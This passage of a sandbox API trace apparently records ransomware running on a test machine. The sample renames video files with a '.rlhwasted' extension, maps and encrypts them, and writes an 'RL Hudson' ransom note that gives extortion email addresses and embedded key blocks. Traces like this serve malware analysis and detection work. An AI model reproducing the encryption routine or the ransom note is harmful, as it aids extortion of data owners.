lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x715c88*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0197.638] SetEndOfFile (hFile=0x108) returned 1 [0197.638] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.638] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715c88 | out: hHeap=0x6b0000) returned 1 [0197.638] lstrcpyW (in: lpString1=0x6e8a76, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\pFRR4i4qEIllHkWV.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\pfrr4i4qeillhkwv.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\pFRR4i4qEIllHkWV.avi.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\pfrr4i4qeillhkwv.avi.rlhwasted")) returned 1 [0197.640] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\Gxp4I0DkC8Jc4mAEt6\\pFRR4i4qEIllHkWV.avi.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\gxp4i0dkc8jc4maet6\\pfrr4i4qeillhkwv.avi.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0197.640] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x124 [0197.640] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x18b08 [0197.640] MapViewOfFile (hFileMappingObject=0x124, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x18b08) returned 0xb00000 [0197.640] CloseHandle (hObject=0x128) returned 1 [0197.648] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0197.649] CloseHandle (hObject=0x124) returned 1 [0197.649] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e7c90 [0197.649] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0197.650] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7cd8 | out: pbBuffer=0x6e7cd8) returned 1 [0197.650] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.650] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0197.651] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0197.651] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.661] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0197.661] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7c90 | out: hHeap=0x6b0000) returned 1 [0197.661] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.662] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]ApZyEkWAC2/EByIbzcgr+HijaSJ4fyd7AMeUHWdM6d3TuZHzzeE3O9nW/vmVANAS\r\nd8QhnOnEFG8ym5oEeXyMlURdVBH/GrLAVQIQJV67nzquqkvKnfOqhuQDL8OfnAQP\r\n2kyaClP1qTH5+GMSZYCooxTLvWBU54FxcvwqQvdQkX/CheuBIk55SjItKV4KbQcc\r\nICjJTeSWL6BkDZHDKwijG476V/3Op98M7nVPezI6m3GAqPGp0tCyqQVU+MQ/LPTo\r\nblGY1bFHHPN7pRsRUs+wORAwuGTnbLJdRET1fMBiQhOpz0sXPgDz7uNScai9I9q9\r\np/Ue9BfA7s2irMCsxYQS+KfdM+9jgI76KOmYEBAGQOt/EIcp0Me5BYD5/bRTEvvx\r\nJzt3sMnxWcLlfSTGA8+3o29l99rnyO4MlYdxUJEjgVSQPzUFMuG0P7ZiHLoObcri\r\n8n+VevfHllfQ4HzbzxGhGOnedkoCr8qtci2JDyMtGO9sWnQf+VdflRZESAlo3Sa3\r\npCBQguMUyAJ9zXcExR2gZ0i/QGpcvvzBl23MsrQuA0uIwIjH8m+PEbX7DezsB3X6\r\n7PQWgMnCrpQ79Zc7t/Cq5xiR6sO6C3XbIy9YGGB2rIlUBOBs8DC/IPOhXTHSo0PK\r\nk5G3dJpJTZ0ECSpiCpL/nt2cAzdssib19yIxnFFJJr1=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.662] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0197.662] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0197.662] SetEndOfFile (hFile=0x108) returned 1 [0197.665] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.665] CloseHandle (hObject=0x108) returned 1 [0197.667] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0197.667] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x715888 | out: hHeap=0x6b0000) returned 1 [0197.667] _aulldvrm () returned 0x0 [0197.667] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0197.668] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0197.668] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.668] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\NR4sO2n6QsBXY.mp4") returned 105 [0197.668] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2dc) returned 0x6e8978 [0197.668] lstrcpyW (in: lpString1=0x6e8a4a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.668] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.669] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0197.669] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0197.669] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0197.669] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\NR4sO2n6QsBXY.mp4.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\nr4so2n6qsbxy.mp4.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0197.670] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0197.671] SetEndOfFile (hFile=0x108) returned 1 [0197.671] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.671] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.671] lstrcpyW (in: lpString1=0x6e8a4a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.671] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\NR4sO2n6QsBXY.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\nr4so2n6qsbxy.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\NR4sO2n6QsBXY.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\nr4so2n6qsbxy.mp4.rlhwasted")) returned 1 [0197.672] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\dYFbqatwM\\NR4sO2n6QsBXY.mp4.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\dyfbqatwm\\nr4so2n6qsbxy.mp4.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0197.672] CreateFileMappingW (hFile=0x124, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0197.673] GetFileSize (in: hFile=0x124, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x16ef2 [0197.673] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16ef2) returned 0xb00000 [0197.673] CloseHandle (hObject=0x124) returned 1 [0197.738] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0197.739] CloseHandle (hObject=0x128) returned 1 [0197.739] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6efa80 [0197.739] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0197.740] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6efac8 | out: pbBuffer=0x6efac8) returned 1 [0197.740] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0197.740] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0197.741] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0197.741] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0197.751] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0197.751] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6efa80 | out: hHeap=0x6b0000) returned 1 [0197.751] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.751] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]PDD7E5AIzpl7+rq7dVFBcbBWkPdTX+B9YwWukupNb10xvwKwvD6+W7scIVBqVEMK\r\nT4S5CF5GeR/s0N3py0UpiZGJiujofAaLXjeYBqhyfcIYXIBsU8B0lVxwCyx/gEtI\r\nLgjQ/GD20Hca7v8MjZfMP6xx9b8Bac2WCW+pJr4r7A8GZs9Zkj37KGI4slPYOztD\r\n11VFk4cadORCVpzGI85OYMFiRACD8hLlyyCYScLDtKErbP92HfR6BS1J+qxGf9qw\r\n3Zx0qq04sfFan+lVbD2UzpO9r7lTElq5v9uO1pP6DUyUVV8M5To+JaqcbhbbsRlN\r\n18xwGp/8jZSUFvEXm2Via3Acf5bdQXIq4Agepi8d98kV5THd7FX0Qco6csu5IF97\r\nlsKF+EDurbRxEmKLNiIHn/JlG4SrvQxh6CIo0OhE6grpwkdXCSQ8D2CFKUxwrvkm\r\n1XxNc7315EuKkNA4yoJZ7Ih4+FOXJs7yCs3pQ/DA4regHjmjOeZ+VYr6qoZTq10U\r\ngJyDChxVbHKKiTOoRvhXDFe7r383xuwrQO/BnlyVeVEhBrC95l9tir2t6+fzlhNv\r\nv80k4EL3C+sPTvciHB7S6F0+7hsC/VFQv1A59L8uYGOkbuOAPvmWim9PLOq99gc1\r\nBTsm39dwySyxNyWwoO/lwEjpfij+X/XPl279q7WntJi=[end_key]\r\nKEEP IT\r\n") returned 981 [0197.751] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0197.751] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0197.752] SetEndOfFile (hFile=0x108) returned 1 [0197.754] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.754] CloseHandle (hObject=0x108) returned 1 [0197.804] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0197.805] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x713ff0 | out: hHeap=0x6b0000) returned 1 [0197.805] _aulldvrm () returned 0x0 [0197.805] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0197.806] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0197.806] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0197.806] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\EgO9waftlEApQVYHLuz1.avi") returned 102 [0197.806] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2d6) returned 0x6e8978 [0197.806] lstrcpyW (in: lpString1=0x6e8a44, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0197.806] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0197.806] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0197.807] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0197.807] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0197.807] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\EgO9waftlEApQVYHLuz1.avi.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\ego9waftleapqvyhluz1.avi.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0197.808] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0197.809] SetEndOfFile (hFile=0x108) returned 1 [0197.809] SetFilePointer (in: hFile=0x108, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.809] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0197.809] lstrcpyW (in: lpString1=0x6e8a44, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0197.809] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\EgO9waftlEApQVYHLuz1.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\ego9waftleapqvyhluz1.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\EgO9waftlEApQVYHLuz1.avi.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\ego9waftleapqvyhluz1.avi.rlhwasted")) returned 1 [0197.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\EgO9waftlEApQVYHLuz1.avi.rlhwasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\ego9waftleapqvyhluz1.avi.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0197.810] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0197.811] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x1394a [0197.811] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1394a) returned 0xb00000 [0197.811] CloseHandle (hObject=0x128) returned 1 [0198.117] UnmapViewOfFile (lpBaseAddress=0xb00000) returned 1 [0198.117] CloseHandle (hObject=0x10c) returned 1 [0198.118] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x200) returned 0x6e7c98 [0198.118] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0198.119] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6e7ce0 | out: pbBuffer=0x6e7ce0) returned 1 [0198.119] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.119] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0198.120] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0198.120] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.131] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x403) returned 0x6d5420 [0198.131] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e7c98 | out: hHeap=0x6b0000) returned 1 [0198.131] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0198.131] _snwprintf (in: _Dest=0x703f50, _Count=0x51a, _Format="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="RL Hudson\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 84550@PROTONMAIL.CH | 67146@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]DFEPVeMT+nVpnqjXr5Ef04iXZozy/Jen7oxNQG2itgPk91Q+5RX+vmT38GgrS7ZS\r\njbhlmMOLZ0ZuURtKgJqSbXrP7HC1Wro+N24XrmNc9hg5ci89tOjQwe5bp0oddL1W\r\n3Wjp25256gPm0P2HV+kMz7rfPqAgrrLQANHbDyWX2kHHRfRzPIbocSPzCKRJA9u0\r\nrBNy59gb/WOMh+YSsx4zCG/oNRG9fA7b+qVV8J5aTx/PSw5r9Q/s0aj7gM3yhokh\r\n8kFwfYqcan2pOZNDJlGE+0JX//l+gJKOXOB3jFAC8+0Xv+RSgwPI2fqqR3MsdGrV\r\nhyL1drvTH1i0DNj3DKJVA1/T4RXQvwrwjwcP29Sb/L/1ZPnNxtTcQ8XePhn5l0El\r\nTcJ4zAUs8CPRDyr6WsUA9wawwHEQjSwZUEzHz8EbjrOjJAkhlBXZEAgc1E3QUgbB\r\nQMg3c39We70zxi95NH4kfch9TrewXhBtPhcjXSICSIQyokkbLiMDUUOqjiQqWn/p\r\n57VJVc6GBPp9jpoSOqA98YgA940Daw3X+PjFaJy9lHSR3cIh5kjeHQ1EtKspFALk\r\n0lbwjunPPU3Gbh739+XHi9NTGAa7iysByl1K80H3IT+mqdU9+hzHQpoWVd23IYtQ\r\nyHKMoT2IZTW/fWvuO4qqEMsbzMlTSO+NdW/23Juen+C=[end_key]\r\nKEEP IT\r\n") returned 981 [0198.131] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d5420 | out: hHeap=0x6b0000) returned 1 [0198.131] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0x7aa, lpNumberOfBytesWritten=0x12afef8, lpOverlapped=0x0 | out: lpBuffer=0x703f50*, lpNumberOfBytesWritten=0x12afef8*=0x7aa, lpOverlapped=0x0) returned 1 [0198.132] SetEndOfFile (hFile=0x108) returned 1 [0198.134] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x703f50 | out: hHeap=0x6b0000) returned 1 [0198.134] CloseHandle (hObject=0x108) returned 1 [0198.136] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e8978 | out: hHeap=0x6b0000) returned 1 [0198.136] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x716de8 | out: hHeap=0x6b0000) returned 1 [0198.137] _aulldvrm () returned 0x0 [0198.137] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f4f10) returned 1 [0198.138] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0198.138] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.138] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\gGPm6.mp4") returned 87 [0198.138] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2b8) returned 0x6d4580 [0198.138] lstrcpyW (in: lpString1=0x6d462e, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0198.138] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x703f50 [0198.138] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f4f10) returned 1 [0198.139] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0xa34, pbBuffer=0x703f50 | out: pbBuffer=0x703f50) returned 1 [0198.139] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0198.139] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_SoPIISM9TrXq0w\\kK7trP1j4OhT_U_cKITH\\gGPm6.mp4.rlhwasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_sopiism9trxq0w\\kk7trp1j4oht_u_ckith\\ggpm6.mp4.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0198.140] WriteFile (in: hFile=0x108, lpBuffer=0x703f50*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, 